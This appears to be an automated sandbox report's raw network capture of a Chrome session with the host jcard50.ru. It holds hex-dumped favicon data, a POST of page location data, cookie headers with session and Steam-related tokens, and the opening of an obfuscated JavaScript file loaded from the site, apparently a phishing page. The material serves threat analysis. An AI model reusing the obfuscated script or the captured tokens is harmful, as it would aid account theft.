                2025-01-13 00:00:41 UTC1369INData Raw: 36 4e 78 45 2b 71 69 62 78 4f 4a 6f 47 30 54 47 70 39 74 45 77 43 6d 64 52 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4a 68 6b 45 77 43 64 61 78 4d 41 6d 47 55 54 4e 5a 74 6f 45 38 4b 63 61 52 50 2b 6e 47 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6e 47 6b 54 2f 35 78 70 45 2f 36 62 61 42 50 43 6d 47 55 54 4e 5a 31 71 45 77 43 58 5a 52 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 53 58 78 4d 41 6c 57 49 54 41 4a 4e 67 45 30 47 55 59 52 50 59 6c 57 49 54
                Data Ascii: 6NxE+qibxOJoG0TGp9tEwCmdRMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJhkEwCdaxMAmGUTNZtoE8KcaRP+nGkT/5tpE/+baRP/m2kT/5tpE/+baRP/m2kT/5tpE/+baRP/m2kT/5tpE/+baRP/m2kT/5tpE/+baRP/nGkT/5xpE/6baBPCmGUTNZ1qEwCXZRMAAAAAAAAAAAAAAAAAAAAAAAAAAACSXxMAlWITAJNgE0GUYRPYlWIT
                2025-01-13 00:00:41 UTC1369INData Raw: 54 2f 63 6a 38 55 2f 33 49 2f 46 50 39 79 50 78 54 2f 63 6a 38 55 2f 33 49 2f 46 50 39 79 50 78 54 2f 63 6a 38 55 33 6e 45 2b 46 43 72 6c 32 39 52 77 37 65 62 68 2b 2f 37 39 2f 66 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 7a 37 2b 2f 2f 4e 75 36 2f 2f 6a 57 56 48 2f 2b 6a 66 32 66 2f 2f 2f 2f 2f 2f 2b 2f 6e 34 2f 38 6d 31 70 76 2b 42 56 44 4c 2f 61 7a 63 51 2f 32 30 35 45 2f 39 74 4f 52 50 2f 62 54 6b 54 2f 32 30 35 45 2f 39 74 4f 52 50 2f 62 54 6b 54 2f 32 30 35 45 2f 39 74 4f 52 50 2f 62 54 6b 54 2f 32 30 35 45 2f 39 74 4f 52 50 37 62 44 6b 54 62 50 2f 2f 2f 37 4c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                Data Ascii: T/cj8U/3I/FP9yPxT/cj8U/3I/FP9yPxT/cj8U3nE+FCrl29Rw7ebh+/79/f////////////////////////////////////////////z7+//Nu6//jWVH/+jf2f//////+/n4/8m1pv+BVDL/azcQ/205E/9tORP/bTkT/205E/9tORP/bTkT/205E/9tORP/bTkT/205E/9tORP7bDkTbP///7L//////////////////////////////////
                2025-01-13 00:00:41 UTC1369INData Raw: 50 51 66 2f 6e 34 64 2f 2f 39 50 48 77 2f 32 39 4c 50 50 39 49 47 67 6a 2f 53 68 30 4c 2f 30 6f 64 43 2f 39 4b 48 51 76 5a 52 78 73 4b 72 45 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 51 59 42 76 39 78 54 30 48 2f 37 75 76 70 2f 2f 76 37 2b 76 39 2f 59 46 54 2f 77 62 4b 73 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 35 39 2f 66 2f 66 6c 39 53 2f 38 61 35 73 2f 2f 2f 2f 2f 2f 2f 67 32 56 5a 2f 30 51 58 42 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 71 78 46 47 67 6c 73 52 42 6f 4a 2b 30 51 61 43 66 39 45 47 67 6e 2f 52 42 6f 4a 2f 30 51 61 43 66 39 45 47 67 6e 2f 52 42 6f 4a 2f 30
                Data Ascii: PQf/n4d//9PHw/29LPP9IGgj/Sh0L/0odC/9KHQvZRxsKrEcbCv9HGwr/RxsK/0cbCv9HGwr/RxsK/0cbCv9HGwr/RxsK/0cbCv9HGwr/RxsK/0QYBv9xT0H/7uvp//v7+v9/YFT/wbKs///////////////////////59/f/fl9S/8a5s///////g2VZ/0QXBv9HGwr/RxsK/0cbCqxFGglsRBoJ+0QaCf9EGgn/RBoJ/0QaCf9EGgn/RBoJ/0
                2025-01-13 00:00:41 UTC1369INData Raw: 4e 78 6b 48 2f 7a 63 5a 42 2f 38 33 47 51 66 59 4e 78 6b 48 4e 6a 63 5a 42 77 41 33 47 41 59 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4e 68 6b 49 41 44 55 61 43 51 41 32 47 51 68 42 4e 52 6f 4a 32 44 55 61 43 66 38 31 47 67 6e 2f 4e 52 6f 4a 2f 7a 55 61 43 66 38 31 47 67 6e 2f 4e 52 6f 4a 2f 7a 55 61 43 66 38 31 47 67 6e 2f 4e 52 6f 4a 2f 7a 55 61 43 66 38 31 47 67 6e 2f 4e 52 6f 4a 2f 7a 55 61 43 66 38 31 47 51 6a 2f 4d 78 67 48 2f 7a 4d 58 42 76 38 30 47 41 6a 2f 4e 52 6b 4a 2f 7a 55 61 43 66 38 31 47 67 6e 2f 4e 52 6f 4a 32 54 59 5a 43 55 45 31 47 67 6b 41 4e 68 6b 4a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4e 42 73 4b 41 44 51 5a 43 77 41 30 47 67 6f 31 4e 42 6f 4c 77 6a 51 61 43 2f 34 30 47 67 76
                Data Ascii: NxkH/zcZB/83GQfYNxkHNjcZBwA3GAYAAAAAAAAAAAAAAAAANhkIADUaCQA2GQhBNRoJ2DUaCf81Ggn/NRoJ/zUaCf81Ggn/NRoJ/zUaCf81Ggn/NRoJ/zUaCf81Ggn/NRoJ/zUaCf81GQj/MxgH/zMXBv80GAj/NRkJ/zUaCf81Ggn/NRoJ2TYZCUE1GgkANhkJAAAAAAAAAAAAAAAAAAAAAAAAAAAANBsKADQZCwA0Ggo1NBoLwjQaC/40Ggv


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.549722104.21.32.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:41 UTC1286OUTPOST /704a2a5075550603 HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                Content-Length: 41
                Cache-Control: max-age=0
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                sec-ch-ua-platform: "Windows"
                Upgrade-Insecure-Requests: 1
                Origin: null
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: navigate
                Sec-Fetch-Dest: iframe
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:00:41 UTC41OUTData Raw: 70 61 74 68 6e 61 6d 65 3d 25 32 46 65 26 73 65 61 72 63 68 3d 26 68 6f 73 74 6e 61 6d 65 3d 6a 63 61 72 64 35 30 2e 72 75
                Data Ascii: pathname=%2Fe&search=&hostname=jcard50.ru
                2025-01-13 00:00:41 UTC1188INHTTP/1.1 201 Created
                Date: Mon, 13 Jan 2025 00:00:41 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sY4paAQqI3nXLRJtTLZsrynM8ecLfrsvbm5fzn0sz%2F1RnYd2uBoHNqQT562KopHTvVwYMfBXx0nUeckMsLP4gaTUE9lRfHGsKl4CgrIeEKJm5emmSmBgLEYTXpp"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111b842cea8cda-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1791&rtt_var=675&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1927&delivery_rate=1615938&cwnd=244&unsent_bytes=0&cid=0b3718be01d08fda&ts=1039&x=0"
                2025-01-13 00:00:41 UTC181INData Raw: 32 34 34 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 64 61 72 6b 72 65 61 64 65 72 2d 6d 6f 64 65 3d 22 64 79 6e 61 6d 69 63 22 20 64 61 74 61 2d 64 61 72 6b 72 65 61 64 65 72 2d 73 63 68 65 6d 65 3d 22 64 61 72 6b 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 27 2f 37 30 34 61 32 61 35 30 37 35 35 35 30 36 30 66 30 64 35 33 35 64 31 61 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e
                Data Ascii: 244<html class=" responsive" lang="en" data-darkreader-mode="dynamic" data-darkreader-scheme="dark"><head><script async src='/704a2a507555060f0d535d1a.js'></script><script>window.
                2025-01-13 00:00:41 UTC406INData Raw: 74 72 69 67 67 65 72 73 20 3d 20 5b 5d 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 23 5f 5f 43 6c 61 73 73 69 63 53 74 61 72 74 20 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f
                Data Ascii: triggers = []</script> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>#__ClassicStart { display: none; }</style> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewpo
                2025-01-13 00:00:41 UTC1369INData Raw: 37 66 66 61 0d 0a 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 66 69 6c 65 6e 61 6d 65 3d 66 61 76 69 63 6f 6e 2e 69 63 6f 3b 62 61 73 65 36 34 2c 41 41 41 42 41 41 55 41 45 42 41 41 41 41 45 41 49 41 42 6f 42 41 41 41 56 67 41 41 41 42 67 59 41 41 41 42 41 43 41 41 69 41 6b 41 41 4c 34 45 41 41 41 67 49 41 41 41 41 51 41 67 41 4b 67 51 41 41 42 47 44 67 41 41 4d 44 41 41 41 41 45 41 49 41 43 6f 4a 51 41 41 37 68 34 41 41 41 41 41 41 41 41 42 41 43 41 41 42 46 49 41 41 4a 5a 45 41 41 41 6f 41 41 41 41 45 41 41 41 41 43 41 41 41 41 41 42 41 43 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                Data Ascii: 7ffa <link rel="shortcut icon" href="data:image/x-icon;filename=favicon.ico;base64,AAABAAUAEBAAAAEAIABoBAAAVgAAABgYAAABACAAiAkAAL4EAAAgIAAAAQAgAKgQAABGDgAAMDAAAAEAIACoJQAA7h4AAAAAAAABACAABFIAAJZEAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA
                2025-01-13 00:00:41 UTC1369INData Raw: 63 5a 42 77 41 33 47 51 59 59 4e 68 6b 49 73 44 59 5a 43 50 38 32 47 51 6a 2f 4e 68 6b 49 2f 7a 59 5a 43 50 38 32 47 51 6a 2f 4e 42 63 47 2f 30 41 6c 46 66 39 53 4f 69 76 2f 52 69 77 63 2f 7a 55 59 42 2f 38 32 47 41 65 77 4f 42 6b 48 47 44 63 5a 42 77 41 78 47 77 30 41 4e 42 6f 4b 41 44 51 61 43 68 67 30 47 67 75 53 4d 78 73 4d 37 6a 4d 62 44 50 38 7a 47 77 7a 2f 4d 78 73 4d 2f 7a 4d 62 44 50 38 79 47 67 76 2f 4d 52 6b 4b 2f 7a 49 61 43 75 34 7a 47 67 75 53 4e 52 6f 4b 47 44 51 61 43 67 41 79 47 77 34 41 41 41 41 41 41 41 41 41 41 41 41 78 47 77 30 41 4d 52 73 4e 42 7a 45 63 44 6b 67 77 48 41 36 6f 4d 42 77 50 35 44 41 63 44 2f 73 77 48 41 2f 38 4d 42 77 50 35 44 41 63 44 71 67 78 48 41 35 4a 4d 52 73 4e 42 7a 45 62 44 51 41 41 41 41 41 41 41 41 41 41 41
                Data Ascii: cZBwA3GQYYNhkIsDYZCP82GQj/NhkI/zYZCP82GQj/NBcG/0AlFf9SOiv/Riwc/zUYB/82GAewOBkHGDcZBwAxGw0ANBoKADQaChg0GguSMxsM7jMbDP8zGwz/MxsM/zMbDP8yGgv/MRkK/zIaCu4zGguSNRoKGDQaCgAyGw4AAAAAAAAAAAAxGw0AMRsNBzEcDkgwHA6oMBwP5DAcD/swHA/8MBwP5DAcDqgxHA5JMRsNBzEbDQAAAAAAAAAAA
                2025-01-13 00:00:41 UTC1369INData Raw: 2f 64 55 49 55 2f 33 56 43 46 50 39 31 51 68 54 2f 64 55 49 55 2f 33 56 43 46 50 39 31 51 68 54 2f 64 55 49 55 2f 33 56 43 46 4f 6c 30 51 42 51 38 31 63 61 35 6a 4f 54 61 30 76 2f 38 2b 2f 72 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 36 2b 66 6a 2f 77 36 36 66 2f 37 57 61 68 76 2f 2b 2f 76 33 2f 35 4e 72 54 2f 35 70 32 57 76 39 75 4f 78 54 2f 62 54 6b 53 2f 32 34 36 45 2f 39 75 4f 68 50 2f 62 6a 6f 54 2f 32 34 36 45 2f 39 75 4f 68 50 2f 62 6a 6f 54 2f 32 34 36 45 2f 39 74 4f 52 4f 4b 2f 2f 2f 2f 7a 66 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 76 37 2f 2f 66 7a 37 2f 2b 2f 70 35 76 2b 33 6e 35 44 2f 73 5a 61 46 2f 2f 44 72 35 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 58 79 37 2f 2b 31 6e 49
                Data Ascii: /dUIU/3VCFP91QhT/dUIU/3VCFP91QhT/dUIU/3VCFOl0QBQ81ca5jOTa0v/8+/r////////////////////////////6+fj/w66f/7Wahv/+/v3/5NrT/5p2Wv9uOxT/bTkS/246E/9uOhP/bjoT/246E/9uOhP/bjoT/246E/9tOROK////zf///////////////////////v7//fz7/+/p5v+3n5D/sZaF//Dr5/////////////Xy7/+1nI
                2025-01-13 00:00:41 UTC1369INData Raw: 42 66 38 36 47 41 58 2f 4f 68 67 46 2f 7a 6f 59 42 76 38 35 46 67 50 2f 58 30 4d 30 2f 38 37 47 77 76 2f 34 39 2f 62 2f 36 4f 54 68 2f 2b 72 6d 35 50 2f 34 39 2f 62 2f 77 37 6d 7a 2f 31 51 33 4a 2f 38 35 46 67 50 2f 4f 78 67 47 34 54 73 59 42 6a 49 37 47 41 59 41 4f 52 67 46 41 44 45 66 45 67 41 34 47 41 5a 6b 4f 42 6b 47 39 44 67 5a 42 76 38 34 47 51 62 2f 4f 42 6b 47 2f 7a 67 5a 42 76 38 34 47 51 62 2f 4f 42 6b 47 2f 7a 67 5a 42 76 38 34 47 51 62 2f 4e 68 59 45 2f 30 63 71 47 76 39 39 61 56 33 2f 6f 35 57 4e 2f 36 43 53 69 76 39 32 59 56 58 2f 51 79 55 55 2f 7a 59 58 42 50 38 34 47 51 62 30 4f 42 67 47 5a 44 41 66 45 67 41 35 47 41 55 41 41 41 41 41 41 44 63 5a 43 41 41 33 47 51 63 46 4e 68 6b 49 65 44 59 61 43 66 51 32 47 67 6e 2f 4e 68 6f 4a 2f 7a 59
                Data Ascii: Bf86GAX/OhgF/zoYBv85FgP/X0M0/87Gwv/49/b/6OTh/+rm5P/49/b/w7mz/1Q3J/85FgP/OxgG4TsYBjI7GAYAORgFADEfEgA4GAZkOBkG9DgZBv84GQb/OBkG/zgZBv84GQb/OBkG/zgZBv84GQb/NhYE/0cqGv99aV3/o5WN/6CSiv92YVX/QyUU/zYXBP84GQb0OBgGZDAfEgA5GAUAAAAAADcZCAA3GQcFNhkIeDYaCfQ2Ggn/NhoJ/zY
                2025-01-13 00:00:41 UTC1369INData Raw: 48 49 54 2f 36 4e 78 45 2b 71 69 62 78 4f 4a 6f 47 30 54 47 70 39 74 45 77 43 6d 64 52 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4a 68 6b 45 77 43 64 61 78 4d 41 6d 47 55 54 4e 5a 74 6f 45 38 4b 63 61 52 50 2b 6e 47 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6d 32 6b 54 2f 35 74 70 45 2f 2b 62 61 52 50 2f 6e 47 6b 54 2f 35 78 70 45 2f 36 62 61 42 50 43 6d 47 55 54 4e 5a 31 71 45 77 43 58 5a 52 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 53 58 78 4d 41 6c 57 49 54 41 4a 4e 67 45 30 47 55 59 52 50 59
                Data Ascii: HIT/6NxE+qibxOJoG0TGp9tEwCmdRMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJhkEwCdaxMAmGUTNZtoE8KcaRP+nGkT/5tpE/+baRP/m2kT/5tpE/+baRP/m2kT/5tpE/+baRP/m2kT/5tpE/+baRP/m2kT/5tpE/+baRP/nGkT/5xpE/6baBPCmGUTNZ1qEwCXZRMAAAAAAAAAAAAAAAAAAAAAAAAAAACSXxMAlWITAJNgE0GUYRPY
                2025-01-13 00:00:41 UTC1369INData Raw: 39 79 50 78 54 2f 63 6a 38 55 2f 33 49 2f 46 50 39 79 50 78 54 2f 63 6a 38 55 2f 33 49 2f 46 50 39 79 50 78 54 2f 63 6a 38 55 33 6e 45 2b 46 43 72 6c 32 39 52 77 37 65 62 68 2b 2f 37 39 2f 66 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 7a 37 2b 2f 2f 4e 75 36 2f 2f 6a 57 56 48 2f 2b 6a 66 32 66 2f 2f 2f 2f 2f 2f 2b 2f 6e 34 2f 38 6d 31 70 76 2b 42 56 44 4c 2f 61 7a 63 51 2f 32 30 35 45 2f 39 74 4f 52 50 2f 62 54 6b 54 2f 32 30 35 45 2f 39 74 4f 52 50 2f 62 54 6b 54 2f 32 30 35 45 2f 39 74 4f 52 50 2f 62 54 6b 54 2f 32 30 35 45 2f 39 74 4f 52 50 37 62 44 6b 54 62 50 2f 2f 2f 37 4c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                Data Ascii: 9yPxT/cj8U/3I/FP9yPxT/cj8U/3I/FP9yPxT/cj8U3nE+FCrl29Rw7ebh+/79/f////////////////////////////////////////////z7+//Nu6//jWVH/+jf2f//////+/n4/8m1pv+BVDL/azcQ/205E/9tORP/bTkT/205E/9tORP/bTkT/205E/9tORP/bTkT/205E/9tORP7bDkTbP///7L//////////////////////////////
                2025-01-13 00:00:41 UTC1369INData Raw: 44 2f 33 4a 50 51 66 2f 6e 34 64 2f 2f 39 50 48 77 2f 32 39 4c 50 50 39 49 47 67 6a 2f 53 68 30 4c 2f 30 6f 64 43 2f 39 4b 48 51 76 5a 52 78 73 4b 72 45 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 51 59 42 76 39 78 54 30 48 2f 37 75 76 70 2f 2f 76 37 2b 76 39 2f 59 46 54 2f 77 62 4b 73 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 35 39 2f 66 2f 66 6c 39 53 2f 38 61 35 73 2f 2f 2f 2f 2f 2f 2f 67 32 56 5a 2f 30 51 58 42 76 39 48 47 77 72 2f 52 78 73 4b 2f 30 63 62 43 71 78 46 47 67 6c 73 52 42 6f 4a 2b 30 51 61 43 66 39 45 47 67 6e 2f 52 42 6f 4a 2f 30 51 61 43 66 39 45 47 67 6e 2f 52 42
                Data Ascii: D/3JPQf/n4d//9PHw/29LPP9IGgj/Sh0L/0odC/9KHQvZRxsKrEcbCv9HGwr/RxsK/0cbCv9HGwr/RxsK/0cbCv9HGwr/RxsK/0cbCv9HGwr/RxsK/0QYBv9xT0H/7uvp//v7+v9/YFT/wbKs///////////////////////59/f/fl9S/8a5s///////g2VZ/0QXBv9HGwr/RxsK/0cbCqxFGglsRBoJ+0QaCf9EGgn/RBoJ/0QaCf9EGgn/RB


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.549725104.21.32.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:42 UTC1024OUTGET /704a2a507555060f0d535d1a.js HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                sec-ch-ua-platform: "Windows"
                Accept: */*
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: script
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:00:43 UTC1285INHTTP/1.1 200 OK
                Date: Mon, 13 Jan 2025 00:00:43 GMT
                Content-Type: application/javascript
                Transfer-Encoding: chunked
                Connection: close
                Content-Disposition: inline
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Last-Modified: Fri, 10 Jan 2025 14:35:22 GMT
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                Cache-Control: max-age=14400
                CF-Cache-Status: MISS
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXO3ubtVh66N8WU12WupfZAeZphDBjKh0PuNUYnb3wGiL%2FXjT6etDr1CCRfYHWvFQnVIJjuFzh6m0tauLwzxllClXyZIvkTaEp%2FYNc%2BdpTdF0IZzchKobzbmfUjd"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111b8cff3c4344-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1710&rtt_var=652&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1602&delivery_rate=1665715&cwnd=47&unsent_bytes=0&cid=8d5414493d21039e&ts=645&x=0"
                2025-01-13 00:00:43 UTC84INData Raw: 37 62 37 31 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 35 64 39 28 5f 30 78 31 33 39 39 38 64 2c 5f 30 78 36 63 65 38 32 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 65 63 32 37 34 3d 5f 30 78 33 65 63 32 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 35 64 39
                Data Ascii: 7b71function _0x55d9(_0x13998d,_0x6ce82f){const _0x3ec274=_0x3ec2();return _0x55d9
